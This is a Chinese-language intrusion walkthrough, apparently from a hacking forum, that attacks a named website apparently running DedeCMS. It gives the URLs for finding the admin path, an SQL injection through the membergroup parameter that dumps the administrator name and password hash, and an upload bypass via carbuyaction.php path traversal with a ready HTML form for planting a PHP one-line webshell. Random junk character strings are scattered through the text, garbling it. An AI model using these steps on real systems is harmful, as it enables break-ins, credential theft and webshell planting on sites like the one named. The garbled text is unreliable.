①注入漏洞。
& O5 ?9 D! J: w# C. y$ B这站 http://www.political-security.com/" g9 b% K) |& E( K
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,3 c3 B4 Q% f8 r9 U+ _
www.political-security.com/data/mysql_error_trace.inc 爆后台 E6 p) |8 U! z$ w$ Z/ |# R$ Q) ^
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
1 a- e8 H9 \; p9 H5 |) W然后写上语句 & K, p" u, B/ f& h$ f
查看管理员帐号, G) m3 x. t0 z3 z
http://www.political-security.co ... &membergroup=@`
5 L" t: |% x6 E/ r! _# k' D8 z4 k; [
; t% K: N1 V& }8 y4 Y' V7 Uadmin 0 k A! U: R0 X V; M
8 w: x* l# J' M/ O0 Z; p! X5 j5 l查看管理员密码6 D" E& V8 p1 |, C' Z0 U2 v
http://www.political-security.co ... &membergroup=@` `6 \, K; n& `5 }/ u
0 C9 |9 `/ b% j M+ c+ w8d29b1ef9f8c5a5af429
3 a% k8 U+ \+ T% k
' x+ C$ K$ |; a& @- h; A& Z0 J: f查看管理员密码
9 S: l1 S. C" o0 J q. J# t9 t* s# H
M0 e k$ d* v得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD50 w1 h3 j- f( c. _( n/ m5 }
4 S& u$ q$ `/ ]. m+ K G: W' y
8d2/ H* r; V* l) B, V
9b1ef9f8c5a5af42
! U1 f1 G/ C: S) E8 g9. ~5 P8 y! ^) X. S! S
8 Q, e( ]9 Q' g# k2 ^& c
cmd5没解出来 只好测试第二个方法
% j/ z8 B" k' u9 h! B0 J
- j9 J) L& A2 |0 q6 A) P0 t! Q: c1 K, n9 ]
②上传漏洞:/ {* R5 l' d1 n; Z
0 N% \0 F" d$ @" v7 o8 e+ `
只要登陆会员中心,然后访问页面链接( Z9 f; R% {. ]9 |
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
- ]. K/ p: D# [# \2 r' V
' Z) {' a/ y3 b9 E/ n如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”$ `+ Y! ?* R0 \" d2 {
- g4 T' N) X8 T4 Q0 h
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
8 _4 W8 S0 e6 r+ ~
0 h4 v5 F. f9 |+ R, O<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
7 _; _+ D& K" b/ N" h或者- v/ f5 G/ `3 y v
即可上传成功 |